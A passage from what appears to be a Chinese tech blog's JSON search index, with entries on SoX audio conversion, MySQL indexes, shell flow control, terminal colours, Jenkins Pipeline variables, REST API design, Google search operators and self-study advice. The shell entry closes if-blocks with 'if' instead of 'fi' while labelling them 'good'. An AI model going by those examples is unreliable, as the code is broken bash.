--ignore-length Ignore input file length given in header; read to EOF -t|--type FILETYPE File type of audio -e|--encoding ENCODING Set encoding (ENCODING may be one of signed-integer, unsigned-integer, floating-point, mu-law, a-law, ima-adpcm, ms-adpcm, gsm-full-rate) -b|--bits BITS Encoded sample size in bits -N|--reverse-nibbles Encoded nibble-order -X|--reverse-bits Encoded bit-order --endian little|big|swap Encoded byte-order; swap means opposite to default -L/-B/-x Short options for the above -c|--channels CHANNELS Number of channels of audio data; e.g. 2 = stereo -r|--rate RATE Sample rate of audio -C|--compression FACTOR Compression factor for output format --add-comment TEXT Append output file comment --comment TEXT Specify comment text for the output file --comment-file FILENAME File containing comment text for the output file --no-glob Don\u0026#39;t `glob\u0026#39; wildcard match the following filename AUDIO FILE FORMATS: 8svx aif aifc aiff aiffc al amb amr-nb amr-wb anb au avr awb caf cdda cdr cvs cvsd cvu dat dvms f32 f4 f64 f8 fap flac fssd gsm gsrt hcom htk ima ircam la lpc lpc10 lu mat mat4 mat5 maud mp2 mp3 nist ogg paf prc pvf raw s1 s16 s2 s24 s3 s32 s4 s8 sb sd2 sds sf sl sln smp snd sndfile sndr sndt sou sox sph sw txw u1 u16 u2 u24 u3 u32 u4 u8 ub ul uw vms voc vorbis vox w64 wav wavpcm wv wve xa xi PLAYLIST FORMATS: m3u pls AUDIO DEVICE DRIVERS: alsa EFFECTS: allpass band bandpass bandreject bass bend biquad chorus channels compand contrast dcshift deemph delay dither divide+ downsample earwax echo echos equalizer fade fir firfit+ flanger gain highpass hilbert input# ladspa loudness lowpass mcompand mixer* noiseprof noisered norm oops output# overdrive pad phaser pitch rate remix repeat reverb reverse riaa silence sinc spectrogram speed splice stat stats stretch swap synth tempo treble tremolo trim upsample vad vol * Deprecated effect + Experimental effect # LibSoX-only effect EFFECT OPTIONS (effopts): effect dependent; see --help-effect 参考 http://sox.sourceforge.net/sox.html#OPTIONS ","permalink":"https://wdd.js.org/posts/2019/10/nw4wmm/","summary":"apt-get install sox libsox-fmt-mp3 -y sox input.vox output.mp3 sox支持命令 ➜ vox sox --help sox: SoX v14.4.1 Usage summary: [gopts] [[fopts] infile]... [fopts] outfile [effect [effopt]]... SPECIAL FILENAMES (infile, outfile): - Pipe/redirect input/output (stdin/stdout); may need -t -d, --default-device Use the default audio device (where available) -n, --null Use the `null\u0026#39; file handler; e.g. with synth effect -p, --sox-pipe Alias for `-t sox -\u0026#39; SPECIAL FILENAMES (infile only): \u0026#34;|program [options] ...\u0026#34; Pipe input from external program (where supported) http://server/file Use the given URL as input file (where supported) GLOBAL OPTIONS (gopts) (can be specified at any point before the first effect): --buffer BYTES Set the size of all processing buffers (default 8192) --clobber Don\u0026#39;t prompt to overwrite output file (default) --combine concatenate Concatenate all input files (default for sox, rec) --combine sequence Sequence all input files (default for play) -D, --no-dither Don\u0026#39;t dither automatically --effects-file FILENAME File containing effects and options -G, --guard Use temporary files to guard against clipping -h, --help Display version number and usage information --help-effect NAME Show usage of effect NAME, or NAME=all for all --help-format NAME Show info on format NAME, or NAME=all for all --i, --info Behave as soxi(1) --input-buffer BYTES Override the input buffer size (default: as --buffer) --no-clobber Prompt to overwrite output file -m, --combine mix Mix multiple input files (instead of concatenating) --combine mix-power Mix to equal power (instead of concatenating) -M, --combine merge Merge multiple input files (instead of concatenating) --magic Use `magic\u0026#39; file-type detection --multi-threaded Enable parallel effects channels processing --norm Guard (see --guard) \u0026amp; normalise --play-rate-arg ARG Default `rate\u0026#39; argument for auto-resample with `play\u0026#39; --plot gnuplot|octave Generate script to plot response of filter effect -q, --no-show-progress Run in quiet mode; opposite of -S --replay-gain track|album|off Default: off (sox, rec), track (play) -R Use default random numbers (same on each run of SoX) -S, --show-progress Display progress while processing audio data --single-threaded Disable parallel effects channels processing --temp DIRECTORY Specify the directory to use for temporary files -T, --combine multiply Multiply samples of corresponding channels from all input files (instead of concatenating) --version Display version number of SoX and exit -V[LEVEL] Increment or set verbosity level (default 2); levels: 1: failure messages 2: warnings 3: details of processing 4-6: increasing levels of debug messages FORMAT OPTIONS (fopts): Input file format options need only be supplied for files that are headerless.","title":"vox语音转mp3"},{"content":"prd是表名,agent是表中的一个字段,index_agent是索引名\ncreate index index_agent on prd(agent) # 创建索引 show index from prd # 显示表上有哪些索引 drop index index_agent on prd # 删除索引 创建索引的好处是查询速度有极大的提成,坏处是更新记录时,有可能也会更新索引,从而降低性能。\n所以索引比较适合那种只写入,或者查询,但是一般不会更新的数据。\n","permalink":"https://wdd.js.org/posts/2019/10/bs9nax/","summary":"prd是表名,agent是表中的一个字段,index_agent是索引名\ncreate index index_agent on prd(agent) # 创建索引 show index from prd # 显示表上有哪些索引 drop index index_agent on prd # 删除索引 创建索引的好处是查询速度有极大的提成,坏处是更新记录时,有可能也会更新索引,从而降低性能。\n所以索引比较适合那种只写入,或者查询,但是一般不会更新的数据。","title":"MySql索引"},{"content":"今天逛github trending, 发现榜首有个项目,叫做v语言。https://github.com/vlang/v\n看了介绍,说这个语言非常牛X,几乎囊括了所有语言的长处。性能、编译耗时、内存使用都是碾压其他语言。\n但是,要记住张无忌娘说过的一句话:越是漂亮的女人,越会骗人。\n每一门语言都是由特定的使用场景,从而则决定了该语言在该场景下解决问题的能力。\n不谈使用场景,而仅仅强调优点,往往是耍流氓。\n你看JavaScript一出生,就是各种问题,但是在浏览器里,JavaScript就是能够一统天下,无人能够掩盖其锋芒。\n","permalink":"https://wdd.js.org/posts/2019/10/awgyhh/","summary":"今天逛github trending, 发现榜首有个项目,叫做v语言。https://github.com/vlang/v\n看了介绍,说这个语言非常牛X,几乎囊括了所有语言的长处。性能、编译耗时、内存使用都是碾压其他语言。\n但是,要记住张无忌娘说过的一句话:越是漂亮的女人,越会骗人。\n每一门语言都是由特定的使用场景,从而则决定了该语言在该场景下解决问题的能力。\n不谈使用场景,而仅仅强调优点,往往是耍流氓。\n你看JavaScript一出生,就是各种问题,但是在浏览器里,JavaScript就是能够一统天下,无人能够掩盖其锋芒。","title":"关于v语言: 越是漂亮的语言,越会骗人"},{"content":"if then // good if [ -d public ] then echo \u0026#34;public exist\u0026#34; if // good if [ -d public ]; then echo \u0026#34;public exist\u0026#34; if // error: if和then写成一行时,条件后必须加上分号 if [ -d public ] then echo \u0026#34;public exist\u0026#34; if // error: shell对空格比较敏感,多个空格和少个空格,执行的含义完全不同 // 在[]中,内侧前后都需要加上空格 if [-d public] then echo \u0026#34;public exist\u0026#34; if if elif then if [ -d public ] then echo \u0026#34;public exist\u0026#34; elif then 循环 switch 常用例子 判断目录是否存在 if [ -d public ] then echo \u0026#34;public exist\u0026#34; if 判断文件是否存在 ","permalink":"https://wdd.js.org/shell/flow-control/","summary":"if then // good if [ -d public ] then echo \u0026#34;public exist\u0026#34; if // good if [ -d public ]; then echo \u0026#34;public exist\u0026#34; if // error: if和then写成一行时,条件后必须加上分号 if [ -d public ] then echo \u0026#34;public exist\u0026#34; if // error: shell对空格比较敏感,多个空格和少个空格,执行的含义完全不同 // 在[]中,内侧前后都需要加上空格 if [-d public] then echo \u0026#34;public exist\u0026#34; if if elif then if [ -d public ] then echo \u0026#34;public exist\u0026#34; elif then 循环 switch 常用例子 判断目录是否存在 if [ -d public ] then echo \u0026#34;public exist\u0026#34; if 判断文件是否存在 ","title":"流程控制"},{"content":"打印彩色字体 0 重置 30 黑色 31 红色 32 绿色 33 黄色 34 蓝色 35 洋红 36 青色 37 白色 把 31 改成其他数字,就可打印其他颜色的 this 了。大部分情况下,我们只需要记住红色和绿色就可以了\necho -e \u0026#34;\\e[1;31m this \\e[0m whang\u0026#34; 打印彩色背景 0 重置 40 黑色 41 红色 42 绿色 43 黄色 44 蓝色 45 洋红 46 青色 47 白色 echo -e \u0026#34;\\e[1;45m this \\e[0m whang\u0026#34; ","permalink":"https://wdd.js.org/shell/colorful-print/","summary":"打印彩色字体 0 重置 30 黑色 31 红色 32 绿色 33 黄色 34 蓝色 35 洋红 36 青色 37 白色 把 31 改成其他数字,就可打印其他颜色的 this 了。大部分情况下,我们只需要记住红色和绿色就可以了\necho -e \u0026#34;\\e[1;31m this \\e[0m whang\u0026#34; 打印彩色背景 0 重置 40 黑色 41 红色 42 绿色 43 黄色 44 蓝色 45 洋红 46 青色 47 白色 echo -e \u0026#34;\\e[1;45m this \\e[0m whang\u0026#34; ","title":"彩色文本与彩色背景打印"},{"content":"docker The docker variable offers convenient access to Docker-related functions from a Pipeline script.\nMethods needing a slave will implicitly run a node {…} block if you have not wrapped them in one. It is a good idea to enclose a block of steps which should all run on the same node in such a block yourself. (If using a Swarm server, or any other specific Docker server, this probably does not matter, but if you are using the default server on localhost it likely will.)\nSome methods return instances of auxiliary classes which serve as holders for an ID and which have their own methods and properties. Methods taking a body return any value returned by the body itself. Some method parameters are optional and are enclosed with []. Reference:\nwithRegistry(url[, credentialsId]) {…} Specifies a registry URL such as https://docker.mycorp.com/, plus an optional credentials ID to connect to it. withServer(uri[, credentialsId]) {…} Specifies a server URI such as tcp://swarm.mycorp.com:2376, plus an optional credentials ID to connect to it. withTool(toolName) {…} Specifies the name of a Docker installation to use, if any are defined in Jenkins global configuration. If unspecified, docker is assumed to be in the $PATH of the slave agent. image(id) Creates an Image object with a specified name or ID. See below. build(image[, args]) Runs docker build to create and tag the specified image from a Dockerfile in the current directory. Additional args may be added, such as \u0026lsquo;-f Dockerfile.other \u0026ndash;pull \u0026ndash;build-arg http_proxy=http://192.168.1.1:3128 .\u0026rsquo;. Like docker build, args must end with the build context. Returns the resulting Image object. Records a FROM fingerprint in the build. Image.id The image name with optional tag (mycorp/myapp, mycorp/myapp:latest) or ID (hexadecimal hash). Image.run([args, command]) Uses docker run to run the image, and returns a Container which you could stop later. Additional args may be added, such as \u0026lsquo;-p 8080:8080 \u0026ndash;memory-swap=-1\u0026rsquo;. Optional command is equivalent to Docker command specified after the image. Records a run fingerprint in the build. Image.withRun[(args[, command])] {…} Like run but stops the container as soon as its body exits, so you do not need a try-finally block. Image.inside[(args)] {…} Like withRun this starts a container for the duration of the body, but all external commands (sh) launched by the body run inside the container rather than on the host. These commands run in the same working directory (normally a slave workspace), which means that the Docker server must be on localhost. Image.tag([tagname]) Runs docker tag to record a tag of this image (defaulting to the tag it already has). Will rewrite an existing tag if one exists. Image.push([tagname]) Pushes an image to the registry after tagging it as with the tag method. For example, you can use image.push \u0026rsquo;latest\u0026rsquo; to publish it as the latest version in its repository. Image.pull() Runs docker pull. Not necessary before run, withRun, or inside. Image.imageName() The id prefixed as needed with registry information, such as docker.mycorp.com/mycorp/myapp. May be used if running your own Docker commands using sh. Container.id Hexadecimal ID of a running container. Container.stop Runs docker stop and docker rm to shut down a container and remove its storage. Container.port(port) Runs docker port on the container to reveal how the port port is mapped on the host. env Environment variables are accessible from Groovy code as env.VARNAME or simply as VARNAME. You can write to such properties as well (only using the env. prefix):\nenv.MYTOOL_VERSION = \u0026#39;1.33\u0026#39; node { sh \u0026#39;/usr/local/mytool-$MYTOOL_VERSION/bin/start\u0026#39; } These definitions will also be available via the REST API during the build or after its completion, and from upstream Pipeline builds using the build step.\nHowever any variables set this way are global to the Pipeline build. For variables with node-specific content (such as file paths), you should instead use the withEnv step, to bind the variable only within a node block.\nA set of environment variables are made available to all Jenkins projects, including Pipelines. The following is a general list of variables (by name) that are available; see the notes below the list for Pipeline-specific details.\nBRANCH_NAME For a multibranch project, this will be set to the name of the branch being built, for example in case you wish to deploy to production from master but not from feature branches. CHANGE_ID For a multibranch project corresponding to some kind of change request, this will be set to the change ID, such as a pull request number. CHANGE_URL For a multibranch project corresponding to some kind of change request, this will be set to the change URL. CHANGE_TITLE For a multibranch project corresponding to some kind of change request, this will be set to the title of the change. CHANGE_AUTHOR For a multibranch project corresponding to some kind of change request, this will be set to the username of the author of the proposed change. CHANGE_AUTHOR_DISPLAY_NAME For a multibranch project corresponding to some kind of change request, this will be set to the human name of the author. CHANGE_AUTHOR_EMAIL For a multibranch project corresponding to some kind of change request, this will be set to the email address of the author. CHANGE_TARGET For a multibranch project corresponding to some kind of change request, this will be set to the target or base branch to which the change could be merged. BUILD_NUMBER The current build number, such as \u0026ldquo;153\u0026rdquo; BUILD_ID The current build ID, identical to BUILD_NUMBER for builds created in 1.597+, but a YYYY-MM-DD_hh-mm-ss timestamp for older builds **BUILD_DISPLAY_NAME The display name of the current build, which is something like \u0026ldquo;#153\u0026rdquo; by default. JOB_NAME Name of the project of this build, such as \u0026ldquo;foo\u0026rdquo; or \u0026ldquo;foo/bar\u0026rdquo;. (To strip off folder paths from a Bourne shell script, try: ${JOB_NAME##*/}) BUILD_TAG String of \u0026ldquo;jenkins-${JOB_NAME}-${BUILD_NUMBER}\u0026rdquo;. Convenient to put into a resource file, a jar file, etc for easier identification. EXECUTOR_NUMBER The unique number that identifies the current executor (among executors of the same machine) that’s carrying out this build. This is the number you see in the \u0026ldquo;build executor status\u0026rdquo;, except that the number starts from 0, not 1. NODE_NAME Name of the slave if the build is on a slave, or \u0026ldquo;master\u0026rdquo; if run on master NODE_LABELS Whitespace-separated list of labels that the node is assigned. WORKSPACE The absolute path of the directory assigned to the build as a workspace. JENKINS_HOME The absolute path of the directory assigned on the master node for Jenkins to store data. JENKINS_URL Full URL of Jenkins, like http://server:port/jenkins/ (note: only available if Jenkins URL set in system configuration) BUILD_URL Full URL of this build, like http://server:port/jenkins/job/foo/15/ (Jenkins URL must be set) JOB_URL Full URL of this job, like http://server:port/jenkins/job/foo/ (Jenkins URL must be set) The following variables are currently unavailable inside a Pipeline script: SCM-specific variables such as SVN_REVISIONAs an example of loading variable values from Groovy:\nmail to: \u0026#39;devops@acme.com\u0026#39;, subject: \u0026#34;Job \u0026#39;${JOB_NAME}\u0026#39; (${BUILD_NUMBER}) is waiting for input\u0026#34;, body: \u0026#34;Please go to ${BUILD_URL} and verify the build\u0026#34; params Exposes all parameters defined in the build as a read-only map with variously typed values. Example:\nif (params.BOOLEAN_PARAM_NAME) {doSomething()} Note for multibranch (Jenkinsfile) usage: the properties step allows you to define job properties, but these take effect when the step is run, whereas build parameter definitions are generally consulted before the build begins. As a convenience, any parameters currently defined in the job which have default values will also be listed in this map. That allows you to write, for example:\nproperties([parameters([string(name: \u0026lsquo;BRANCH\u0026rsquo;, defaultValue: \u0026lsquo;master\u0026rsquo;)])])\ngit url: \u0026#39;…\u0026#39;, branch: params.BRANCH and be assured that the master branch will be checked out even in the initial build of a branch project, or if the previous build did not specify parameters or used a different parameter name.\ncurrentBuild The currentBuild variable may be used to refer to the currently running build. It has the following readable properties:\nnumber build number (integer) result typically SUCCESS, UNSTABLE, or FAILURE (may be null for an ongoing build) currentResult typically SUCCESS, UNSTABLE, or FAILURE. Will never be null. resultIsBetterOrEqualTo(String) Compares the current build result to the provided result string (SUCCESS, UNSTABLE, or FAILURE) and returns true if the current build result is better than or equal to the provided result. resultIsWorseOrEqualTo(String) Compares the current build result to the provided result string (SUCCESS, UNSTABLE, or FAILURE) and returns true if the current build result is worse than or equal to the provided result. displayName normally #123 but sometimes set to, e.g., an SCM commit identifier description additional information about the build id normally number as a string timeInMillis time since the epoch when the build was scheduled startTimeInMillis time since the epoch when the build started running duration duration of the build in milliseconds durationString a human-readable representation of the build duration previousBuild another similar object, or null nextBuild similarly absoluteUrl URL of build index page buildVariables for a non-Pipeline downstream build, offers access to a map of defined build variables; for a Pipeline downstream build, any variables set globally on env changeSets a list of changesets coming from distinct SCM checkouts; each has a kind and is a list of commits; each commit has a commitId, timestamp, msg, author, and affectedFiles each of which has an editType and path; the value will not generally be Serializable so you may only access it inside a method marked @NonCPS rawBuild a hudson.model.Run with further APIs, only for trusted libraries or administrator-approved scripts outside the sandbox; the value will not be Serializable so you may only access it inside a method marked @NonCPS Additionally, for this build only (but not for other builds), the following properties are writable: result displayName description scm Represents the SCM configuration in a multibranch project build. Use checkout scm to check out sources matching Jenkinsfile.You may also use this in a standalone project configured with Pipeline script from SCM, though in that case the checkout will just be of the latest revision in the branch, possibly newer than the revision from which the Pipeline script was loaded.\n参考 Global Variable Reference ","permalink":"https://wdd.js.org/posts/2019/10/ikg19e/","summary":"docker The docker variable offers convenient access to Docker-related functions from a Pipeline script.\nMethods needing a slave will implicitly run a node {…} block if you have not wrapped them in one. It is a good idea to enclose a block of steps which should all run on the same node in such a block yourself. (If using a Swarm server, or any other specific Docker server, this probably does not matter, but if you are using the default server on localhost it likely will.","title":"Jenkins 全局变量参考"},{"content":"1. 什么是REST? 表现层状态转换(REST,英文:Representational State Transfer)是Roy Thomas Fielding博士于2000年在他的博士论文[1] 中提出来的一种万维网软件架构风格,目的是便于不同软件/程序在网络(例如互联网)中互相传递信息。表现层状态转换(REST,英文:Representational State Transfer)是根基于超文本传输协议(HTTP)之上而确定的一组约束和属性,是一种设计提供万维网络服务的软件构建风格。匹配或兼容于这种架构风格(简称为 REST 或 RESTful)的网络服务,允许客户端发出以统一资源标识符访问和操作网络资源的请求,而与预先定义好的无状态操作集一致化。wikipdeia\nREST API 不是一个标准或者一个是协议,仅仅是一种风格,一种style。\nRESTful API的简单定义可以轻松解释这个概念。 REST是一种架构风格,RESTful是它的解释。也就是说,如果您的后端服务器具有REST API,并且您(从网站/应用程序)向客户端请求此API,则您的客户端为RESTful。\n2. REST API最为重要的约束 Client-Server 通信只能由客户端单方面发起,表现为请求-响应的形式 Stateless 通信的会话状态(Session State)应该全部由客户端负责维护 Cache 响应内容可以在通信链的某处被缓存,以改善网络效率 Uniform Interface 通信链的组件之间通过统一的接口相互通信,以提高交互的可见性 Layered System 通过限制组件的行为(即每个组件只能“看到”与其交互的紧邻层),将架构分解为若干等级的层。 Code-On-Demand 支持通过下载并执行一些代码(例如Java Applet、Flash或JavaScript),对客户端的功能进行扩展。 3. REST API HTTP方法 与 CURD REST API 使用POST,GET, PUT, DELETE的HTTP方法来描述对资源的增、查、改、删。这四个HTTP方法在数据层对应着SQL的插入、查询、更新、删除操作。\n4. 状态码 1xx - informational; 2xx - success; 3xx - redirection; 4xx - client error; 5xx - server error. 5. RESTful架构设计 GET /users - get all users; GET /users/123 - get a particular user with id = 123; GET /posts - get all posts. POST /users. PUT /users/123 - upgrade a user entity with id = 123. DELETE /users/123 - delete a user with id = 123. 6. 文档 7. 版本 版本管理一般有两种\n位于url中的版本标识: http://example.com/api/v1 位于请求头中的版本标识:Accept: application/vnd.redkavasyl+json; version=2.0 8. 深入理解状态与无状态 我认为REST架构最难理解的就是状态与无状态。下面我画出两个示意图。\n图1是有状态的服务,状态存储于单个服务之中,一旦一个服务挂了,状态就没了,有状态服务很难扩展。无状态的服务,状态存储于客户端,一个请求可以被投递到任何服务端,即使一个服务挂了,也不回影响到同一个客户端发来的下一个请求。\n【图1 有状态的架构】\n【图2 无状态的架构】\neach request from client to server must contain all of the information necessary to understand the request, and cannot take advantage of any stored context on the server. Session state is therefore kept entirely on the client. rest_arch_style stateless\n每一个请求自身必须携带所有的信息,让客户端理解这个请求。举个栗子,常见的翻页操作,应该客户端告诉服务端想要看第几页的数据,而不应该让服务端记住客户端看到了第几页。\n9. 参考 A Beginner’s Tutorial for Understanding RESTful API Versioning REST Services http://ruanyifeng.com/blog/2018/10/restful-api-best-practices.html https://florimond.dev/en/posts/2018/08/restful-api-design-13-best-practices-to-make-your-users-happy/ https://docs.microsoft.com/en-us/azure/architecture/best-practices/api-design https://github.com/Microsoft/api-guidelines/blob/master/Guidelines.md https://github.com/cocoajin/http-api-design-ZH_CN https://www.cnblogs.com/welan/p/9875103.html ","permalink":"https://wdd.js.org/posts/2019/10/irl0p4/","summary":"1. 什么是REST? 表现层状态转换(REST,英文:Representational State Transfer)是Roy Thomas Fielding博士于2000年在他的博士论文[1] 中提出来的一种万维网软件架构风格,目的是便于不同软件/程序在网络(例如互联网)中互相传递信息。表现层状态转换(REST,英文:Representational State Transfer)是根基于超文本传输协议(HTTP)之上而确定的一组约束和属性,是一种设计提供万维网络服务的软件构建风格。匹配或兼容于这种架构风格(简称为 REST 或 RESTful)的网络服务,允许客户端发出以统一资源标识符访问和操作网络资源的请求,而与预先定义好的无状态操作集一致化。wikipdeia\nREST API 不是一个标准或者一个是协议,仅仅是一种风格,一种style。\nRESTful API的简单定义可以轻松解释这个概念。 REST是一种架构风格,RESTful是它的解释。也就是说,如果您的后端服务器具有REST API,并且您(从网站/应用程序)向客户端请求此API,则您的客户端为RESTful。\n2. REST API最为重要的约束 Client-Server 通信只能由客户端单方面发起,表现为请求-响应的形式 Stateless 通信的会话状态(Session State)应该全部由客户端负责维护 Cache 响应内容可以在通信链的某处被缓存,以改善网络效率 Uniform Interface 通信链的组件之间通过统一的接口相互通信,以提高交互的可见性 Layered System 通过限制组件的行为(即每个组件只能“看到”与其交互的紧邻层),将架构分解为若干等级的层。 Code-On-Demand 支持通过下载并执行一些代码(例如Java Applet、Flash或JavaScript),对客户端的功能进行扩展。 3. REST API HTTP方法 与 CURD REST API 使用POST,GET, PUT, DELETE的HTTP方法来描述对资源的增、查、改、删。这四个HTTP方法在数据层对应着SQL的插入、查询、更新、删除操作。\n4. 状态码 1xx - informational; 2xx - success; 3xx - redirection; 4xx - client error; 5xx - server error. 5. RESTful架构设计 GET /users - get all users; GET /users/123 - get a particular user with id = 123; GET /posts - get all posts.","title":"Restful API 架构思考"},{"content":"1. 谷歌搜索指令 2. 基本命令 符号 简介 语法 注意点 示例 + 包含A且必须包含B A +B A和+之间有空格 Maxwell +wills - 包含A且不包含B A -B A和+之间有空格 Maxwell -Absolom \u0026quot; \u0026quot; 完整匹配AB \u0026ldquo;AB\u0026rdquo; \u0026ldquo;Thomas Jefferson\u0026rdquo; OR 包含A或者B A OR B 或者 `A B` +-\u0026ldquo;OR 指令可以组合,完成更复杂的查询 beach -sandy +albert +nathaniel ~ 包含A, 并且包含B的近义词 A ~B github ~js .. 区间查询 AB之间 A..B china 1888..2000 * 匹配任意字符 node* java site: 站内搜索 A site:B filetype: 按照文件类型搜索 A filetype:B csta filetype:pdf 3. 关键词使用 方法 说明 示例 列举关键词 列举所有和搜索相关的关键词,并且尽量把重要的关键词排在前面。不同的关键词顺序会导致不同的返回不同的结果 书法 毛笔 绘画 不要使用某些词 如代词介词语气词,如i, the, of, it, 我,吗 搜索引擎一般会直接忽略这些信息含量少的词 大小写不敏感 大写字符和小写字符在搜索引擎看没有区别,尽量使用小写的就可以 4. 特殊工具 4.1. define 快速返回关键词定义 4.2. 计算器 4.3. 单位转换 4.4. 时区查询 4.5. 地区查询 4.6. 天气查询 5. 参考 Advanced Google Search Commands Google_rules_for_searching.pdf An introduction to search commands ","permalink":"https://wdd.js.org/posts/2019/10/giflpm/","summary":"1. 谷歌搜索指令 2. 基本命令 符号 简介 语法 注意点 示例 + 包含A且必须包含B A +B A和+之间有空格 Maxwell +wills - 包含A且不包含B A -B A和+之间有空格 Maxwell -Absolom \u0026quot; \u0026quot; 完整匹配AB \u0026ldquo;AB\u0026rdquo; \u0026ldquo;Thomas Jefferson\u0026rdquo; OR 包含A或者B A OR B 或者 `A B` +-\u0026ldquo;OR 指令可以组合,完成更复杂的查询 beach -sandy +albert +nathaniel ~ 包含A, 并且包含B的近义词 A ~B github ~js .. 区间查询 AB之间 A..B china 1888..2000 * 匹配任意字符 node* java site: 站内搜索 A site:B filetype: 按照文件类型搜索 A filetype:B csta filetype:pdf 3.","title":"掌握谷歌搜索高级指令"},{"content":"1. 培训行业的现状和问题 进入培训班学习可能有一下两个原因:\n想转行 学校里学的东西太过时了,需要深入学习本行业的知识 培训的行业的核心思想都是:如何快速的让你能够面试通过\n老师教的东西大多是一些面试必须要问的一些知识,做的项目也应该都是市面上比较火的项目。这么做的不利之处有以下几点:\n局限性:知识局限于教师的授课范围,知识面窄 扩展性:快餐式学习管饱不管消化,很多知识吸收不高,无法举一反三 系统性:没有系统的整体知识体系 所以这些因素可能会让用人不太喜欢培训出来的应聘者,而往往希望刚毕业的应届生。但是,培训行业出来的应聘者,也不乏国士无双的牛逼人物。\n2. 如何成为培训出来的牛人? 无论在哪个行业,自学都是必不可少的事情。毕业不是学习的终点,而应该是起点。你和技术牛人之间的距离或许并不遥远,可能只是一个芭蕉扇的距离。\n2.1. 读权威书籍,扎实理论基础 每个行业都有一些经历时间考验而熠熠生辉的经典数据,例如在前端行业。我认为下面两本书是必须要读完一本的。\n基础\nJavaScript高级程序设计 JavaScript权威指南 进阶\nJavaScript语言精粹 JavaScript忍者秘籍 You Don\u0026rsquo;t Know JS JS函数式编程指南 2.2. 动手能力,闲话少说,放码过来 各种demo啊,效果啊,有时间自己都可以撸一遍,放在github上,又不收钱,还能提高动手能力。\n2.3. 数据结构 差劲的程序员操心代码,牛逼的程序员操心数据结构和它们之间的关系。 一一Linus Torvalds, Linux 创始人\n优秀的数据结构,可以节省你80%的编码时间。差劲的数据结构,你需要花大量的时间去做各种高难度动作的转换,一不小心,数据库就要累的气喘如牛,停机罢工。\n2.4. 知识积累,从博客开始 如果你已经在某个行业工作个两三年,一篇像样的博客都没有。\n那我觉得你可能是个懒人。因为几乎很少写东西。\n我觉得你可以是个自私的人。因为做计算机行业的,谁没有用过别人造的轮子。即使你没有造轮子的能力,即使你给出一个问题应该如何解决的,至少你对计算机行业也作出了你的贡献。\n2.5. 互联网的基石 TCP IP 计算机行业是分层的,就像大海一样,海面上的往往都是惊涛骇浪,暴风骤雨,各种框架层出不穷,争奇斗艳。当你深入海底,你会发现,那里是最平静的地方。而TCP IP等协议知识,就是整个互联网大航海时代的海底。互联网行业如此多娇,引无数框架竞折腰。浪潮之巅者成为行业热点,所有资源会喷薄涌入,失去优势被替代者,往往折戟沉沙铁未销。总之,越是上层,竞争越激烈,换代越快。\n但是底层的TCP/IP之类的知识,往往几十年都不会有多大的改变。而且无论你从事什么语言开发,只要你涉及到通信了,你就需要TCP/IP的知识点,不过你不清楚这些知识点,你可以随时给自己埋下定时炸弹。\n这个错误我也犯过,你可以看我的犯错记录:哑代理 - TCP链接高Recv-Q,内存泄露的罪魁祸首。\n关于TCP/IP, 推荐一下书籍\n基础\n图解TCP/IP : 第5版 图解HTTP 进阶\nHTTP权威指南 2.6. 工具的威力 你用刀,我用枪,谁说谁能打过谁。原始社会两个野蛮人相遇,块头大的,食物多,可以拥有更多的繁衍后代的权利。但是当一个野蛮人知道用刀的威力时,他就不会害怕胳膊比较粗的对手了。\n举例来说,前端开发免不了有时需要一个静态文件服务器,如果你只知道阿帕奇,那你的工具也太落后了。你可以看看这篇文章:一行命令搭建简易静态文件http服务器\n当你想要更偷懒,想要不安于现状时,你会找到更多的厉害的工具。\n2.7. 英语阅读能力 IT行业还有一个现象,就是看英文文档如喝中药一般,总是捏着鼻子也看不下去。看中文文档放佛如喝王老吉,消火又滋润。\nIT行业至今来说,放佛还是个舶来品。所有的最新的文档都是英文的。但是也不乏有好的中文翻译文档,但是都是需要花时间去等待。而且英文文档也随着翻译者的水平而参差不齐。\n其实我们完全没必要去害怕英文文档,其实英文文档里最常用的单词往往是很固定的。又不是什么言情小说,总是让你摸不着头脑。\n你不想看英文文档,从本质上说,还是因为你懒。\n2.8. 文档能力 大多说程序的文档都是写给自己看的,或者说大多说的程序员的语文都是数学老师教的。这个其实很让看文档的人苦恼的。一个优秀的程序和框架,无一不是文档非常完善。因为文档的完善才能有利于文档的传播,才有利于解决问题。你的框架再牛逼,效率再如何高,没有人能看的懂,那是没用了。闭门造车永远也搞不出好东西。\n关于如何写作文档,可以参考:如何写好技术文档?\n3. 总结 开放的思维,敢于接纳一些新事物 不断学习,不舍昼夜 记笔记,写博客,要给所有的努力留下记录 ","permalink":"https://wdd.js.org/posts/2019/10/vyu2rs/","summary":"1. 培训行业的现状和问题 进入培训班学习可能有一下两个原因:\n想转行 学校里学的东西太过时了,需要深入学习本行业的知识 培训的行业的核心思想都是:如何快速的让你能够面试通过\n老师教的东西大多是一些面试必须要问的一些知识,做的项目也应该都是市面上比较火的项目。这么做的不利之处有以下几点:\n局限性:知识局限于教师的授课范围,知识面窄 扩展性:快餐式学习管饱不管消化,很多知识吸收不高,无法举一反三 系统性:没有系统的整体知识体系 所以这些因素可能会让用人不太喜欢培训出来的应聘者,而往往希望刚毕业的应届生。但是,培训行业出来的应聘者,也不乏国士无双的牛逼人物。\n2. 如何成为培训出来的牛人? 无论在哪个行业,自学都是必不可少的事情。毕业不是学习的终点,而应该是起点。你和技术牛人之间的距离或许并不遥远,可能只是一个芭蕉扇的距离。\n2.1. 读权威书籍,扎实理论基础 每个行业都有一些经历时间考验而熠熠生辉的经典数据,例如在前端行业。我认为下面两本书是必须要读完一本的。\n基础\nJavaScript高级程序设计 JavaScript权威指南 进阶\nJavaScript语言精粹 JavaScript忍者秘籍 You Don\u0026rsquo;t Know JS JS函数式编程指南 2.2. 动手能力,闲话少说,放码过来 各种demo啊,效果啊,有时间自己都可以撸一遍,放在github上,又不收钱,还能提高动手能力。\n2.3. 数据结构 差劲的程序员操心代码,牛逼的程序员操心数据结构和它们之间的关系。 一一Linus Torvalds, Linux 创始人\n优秀的数据结构,可以节省你80%的编码时间。差劲的数据结构,你需要花大量的时间去做各种高难度动作的转换,一不小心,数据库就要累的气喘如牛,停机罢工。\n2.4. 知识积累,从博客开始 如果你已经在某个行业工作个两三年,一篇像样的博客都没有。\n那我觉得你可能是个懒人。因为几乎很少写东西。\n我觉得你可以是个自私的人。因为做计算机行业的,谁没有用过别人造的轮子。即使你没有造轮子的能力,即使你给出一个问题应该如何解决的,至少你对计算机行业也作出了你的贡献。\n2.5. 互联网的基石 TCP IP 计算机行业是分层的,就像大海一样,海面上的往往都是惊涛骇浪,暴风骤雨,各种框架层出不穷,争奇斗艳。当你深入海底,你会发现,那里是最平静的地方。而TCP 